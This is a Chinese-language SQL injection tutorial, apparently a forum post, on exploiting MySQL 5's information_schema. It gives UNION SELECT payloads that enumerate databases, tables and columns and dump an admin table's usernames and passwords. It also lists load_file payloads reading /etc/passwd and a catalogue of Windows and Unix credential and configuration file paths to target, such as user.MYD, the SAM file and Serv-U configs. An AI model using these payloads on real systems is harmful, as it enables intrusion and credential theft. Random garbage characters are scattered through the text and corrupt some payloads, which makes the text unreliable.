mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
2 q- i# b+ l2 s( Y
: j1 l& X2 {, v7 z( K8 w

- ~9 f' j& ]$ F1 V) r; C7 rMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
3 w6 u( K/ c/ w; U3 t明。
/ Z% g5 E  o- j7 h1 A( Y; r1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
* g& O0 O1 N3 R' r% W, {/ `|—字段：SCHEMA_NAME ->数据库名称
7 C1 m, x/ p4 V& m4 Y
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

* O9 Q2 v, s- d. H9 @" R|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
- V5 L) G  |+ X: b' G|—字段：TABLE_NAME ->存储所属表的名称
5 R% L# |- j. }, Q
/ ]8 E! E% Z1 ^  {+ }|—字段：COLUMN_NAME ->该字段的名称
" l( k4 i0 u" l8 i0 k5 C0 ?3 s5 o* y
: E# y# _7 D- p2 }6 J  w6 ]#########################################################################
/ u5 Q! O/ E% Q##
4 f8 `$ k( f" |  \$ T; @9 [1 r9 P
9 T# p9 i- E& h& X! ]0×001 获取系统信息:
8 l  ?4 R+ d; J7 w: p
/ ~( R: [3 Q) G% |union select 1,2,3,4,5,concat
4 B& \7 a' v0 `(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*

2 m- M2 U3 P7 V7 ]@@global.version_compile_os 获取系统版本
' I2 }' ~) o7 l6 M% O! e' E3 Q% d
6 U# r+ R& R  L7 k@@datadir 数据库路径
, ]4 B4 O5 u4 f5 G6 v" w0 [# ydatabase() 当前数据库名称
0x3c62723e 换行HEX值
9 I- R* B0 y& ?; [
*/

& b* d* X- y0 J2 [* t######################################################################

: ]7 U3 H, ?3 m1 [0×002 获取表名

! E  u8 A% ?  i4 ~+ R4 R0 W' Sunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
" e6 ]+ }9 N# m6 ^/ ~8 dinformation_schema.tables where table_schema=0x67617264656e /*
) C, ?- I% |% E6 q, D) }1 @/ C
8 X- W7 U$ L% C/*
8 K2 u3 f; N- E
0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

2 q# j; U! }8 ?2 h$ U5 V  ~1 c######################################################################

. v! J* a* I% a1 F0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
" ?. ^: t: K; M8 q4 R: p" minformation_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*

7 I) @& L  x" r1 `: D1 P2 M/*
! i) L1 h; }# k2 G9 `: n
5 i' i0 J( f& s+ Mgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
8 p% W$ {! a7 P" K. u3 [
0x67617264656e ->数据库名

*/

# X( ?: O0 j# v8 U) m3 |" t% u. g#####################################################################

: e0 V7 ]7 h' z1 ^2 L0×004 获取数据
1 W' o/ @2 E# p- G
5 ~; X6 P7 ]" D0 Z* H. u3 c' Hunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
2 V# E% ?; m. y$ ^4 j* @  |  m! j
: |* x! _4 q& B* Z/ Ounion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

- ^! u& T: M$ {7 l; f4 W% c1 h/*

0x3c62723e 换行符号HEX编码

% R# U9 _) D2 q, cgroup_concat 同时获得该字段所有数据
' c9 R  B& {' T: V  X# Z8 ?, ?( B
*/
* L0 K& ?* {# P6 @5 A0 k6 a3 ~


1 q* y5 O3 G* U2 s7 p& Q
% y8 Y% Q' |: _. Y2 y
顺便添加一些mysql注入时非常有用的一些东西

' h+ _$ W* T" z$ w# u简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
7 k, [$ H4 K2 T' n. q: V
4 ~7 D. Y% R) h1 w- I1:system_user() 系统用户名
0 X4 i/ R1 S0 B9 |2:user()        用户名
, D. R' h* }- P% a$ y3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
% A9 l3 d+ c6 Y' a$ s+ o- I6:version()     MYSQL数据库版本
9 T+ j! J4 `0 q1 o; ^5 }0 Y; L7:load_file()   MYSQL读取本地文件的函数
. @# T3 V( j% q4 W  b. v0 I8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
; f% C( P4 o6 ?收集的一些路径：
# f+ a9 x" ^0 h* z$ W2 T3 K$ BWINDOWS下:
/ Z3 ?) R! [' ic:/boot.ini          //查看系统版本
- t( O% A- B" t" r2 yc:/windows/php.ini   //php配置信息
- A% C# c; A+ ^4 j" r$ L* |c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
" H, a2 ^( n4 w9 I6 W6 w. Dc:/winnt/php.ini
; J$ P! B9 s. n& b5 B6 ]( jc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
1 F- P6 T* f4 \( yc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
( A2 [9 X- T$ I8 A: jc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
! z0 L6 I8 _; W& W2 ic:\Program Files\RhinoSoft.com\ServUDaemon.exe
9 m# G! r3 m7 n! B4 k. r: AC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
1 a) ]! e/ v! E6 Zc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
0 z0 I1 p  @9 r% B6 s4 w# E. {

c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
" D/ _& T1 E, B3 g+ a
8 }  A+ r, \1 k# y! tLUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
& L1 ?, }2 J+ X3 J# L( h( D$ p: p+ ]/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
  X! Y& d- D* k8 h1 E8 I: z/etc/my.cnf //mysql的配置文件
! ?. m" c+ r5 g' j  ]! n/etc/redhat-release //系统版本
/etc/issue
0 y* z8 R3 ]+ q, f& T) e0 D/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
* H) C$ X- Y' W3 y1 v/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
7 O( u  K$ i5 [2 ~6 G4 ]/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
( x+ e$ o2 g* P% K$ G/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  f4 w4 p/ l6 P7 U/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
7 O0 e, r& S; y% r2 y& t& b5 v/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
/ X( `9 G/ s, G* o! r6 D上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

- ^# |- ~/ T& l8 E/ Q